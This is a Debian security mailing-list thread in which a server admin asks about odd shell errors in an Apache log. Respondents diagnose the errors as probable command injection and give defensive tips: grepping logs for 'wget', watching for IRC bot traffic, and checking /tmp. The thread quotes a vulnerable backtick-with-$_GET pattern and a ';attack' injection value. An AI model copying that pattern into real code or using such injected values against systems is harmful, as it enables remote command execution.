[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

RE: Weird message in my apache error log

What does your application do? It looks like it is finding a shell script
somewhere?  We've seen similar things when executing CGI's and not filtering
the input data so well.  The line 22, 24 make me think there is a script
somewhere rather than arbitrary GET data.

> -----Original Message-----
> From: Brian Brazil [mailto:bbrazil@netsoc.tcd.ie]
> Sent: Tuesday, January 31, 2006 4:53 PM
> To: debian-security@lists.debian.org
> Subject: Re: Weird message in my apache error log
> 
> On Tue, Jan 31, 2006 at 11:19:45PM +0100, Josep Serrano wrote:
> > Hello all. I got some weird entries in my apache error log.
> > Any clues about what/where/how ?
> >
> > sh: -c: line 22: unexpected EOF while looking for matching ``'
> > sh: -c: line 24: syntax error: unexpected end of file
> >
> > sh: -c: line 0: unexpected EOF while looking for matching `"'
> > sh: -c: line 1: syntax error: unexpected end of file
> 
> Looks like someone is trying to do arbritary commmand execution. You
> probably have a script somewhere that says `command $_GET['var']`, and
> someone is passing ';attack' as var, but it isn't quite working.
> 
> I suggest using the audit log feature of mod_security, or just grepping
> through your access logs for anything odd ('wget' is a good search
> term).
> 
> You might have a bot on the system, check for any odd network
> connections, especially to port 6667 (IRC). Also look for www-data owned
> files in /tmp.
> 
> Brian
> 
> --
> Website: http://www.netsoc.tcd.ie/~bbrazil
Reply to: